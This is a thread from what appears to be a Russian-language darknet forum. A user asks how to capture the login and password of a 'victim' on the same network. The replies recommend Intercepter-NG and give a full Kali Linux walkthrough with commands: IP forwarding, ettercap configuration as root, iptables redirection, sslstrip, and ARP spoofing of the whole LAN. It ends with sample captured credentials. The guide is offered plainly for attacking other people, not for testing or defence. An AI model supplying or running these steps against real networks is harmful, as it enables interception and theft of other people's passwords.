Узнать Логин и Пароль

  • Автор темы HHIDE_DUMP
  • Дата начала
  • Просмотры 898
  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Всем привет ) помогите если ты сидишь через одну сеть с жертвой и хочешь узнать логин и пароль от сайта куда сейчас он заходит.как это сделать ? и какой софт нужен ? спасибо $
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Можешь попробовать Intercepter-NG. Довольно популярная тема, очень мощьная, и инфы про софт куча.
 

HHIDE_DUMP

Гость
H

HHIDE_DUMP

Гость
Дороу бандит, для таких делишек желательно уже установить на флешку OC Kali-Linux, в биосе через no-cd запускаешь, находишь терминал(консоль) думаю проблем не составит.
Открываем консоль и пишем:

Код

echo '1' > /proc/sys/net/ipv4/ip_forward


2) Открываем консоль опять же:

Пишем:

Код

leafpad /etc/etter.conf


Если открывается пустое окно, то пишем это:

Код

leafpad /etc/ettercap/etter.conf


В поле [privs] находим строчки:

Код

ec_uid = %тут какое-то значение% # nobody is the default
ec_gid = %тут какое-то значение% # nobody is the default


Изменяем %тут какое-то значение% на 0.

В итоге будет так:

Код

ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default


Далее жмем ctrl+f и вводим туда iptables

Нас кидает на следующие строчки:
Код

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Раскомментируем redir_command_on и redir_command_off

В итоге будет так:

Код

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


3) Теперь нам нужно настроить iptables:

Вводим команду:

Код

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080


Теперь весь трафик с 80 порта у нас будет переадресовываться на 8080, на котором мы потом запустим sslstrip

4) Активируем sslstip:

Код

sslstrip -l 8080 -a


-l - порт на котором слушаем
-a - снифать все

5) Запуск атаки

Код

ettercap -T -q -P autoadd -i wlan0 -M arp:remote // //


-T - указываем, что в текстовом режиме
-q - не показываем содержимое пакетов, только пароли
-P autoadd - подключаем плагин autoadd, чтобы у нас все будущие клиенты сети тоже были атакованы
-i wlan0 - указываем, что наш интерфейс это wlan0
-M arp:remote - указываем, что нам нужен именно ARP Spoofing
// // - атакуем всю LAN сеть

Итак, атака запущена.

Чтобы ее отменить нужно нажать q на англ раскладки ( Не CTRL+C! А именно q, чтобы восстановить arp таблицу! )

6) Теперь ждем

7) Как только кто-то залогинится куда либо, то у нас в терминале с ettercap будет строка вида:

Код

HTTP : 217.69.139.60:80 -> USER: offsec PASS: password123 INFO:
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!



Где после USER идет логин, после PASS идет пароль, после INFO будет ссылка
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя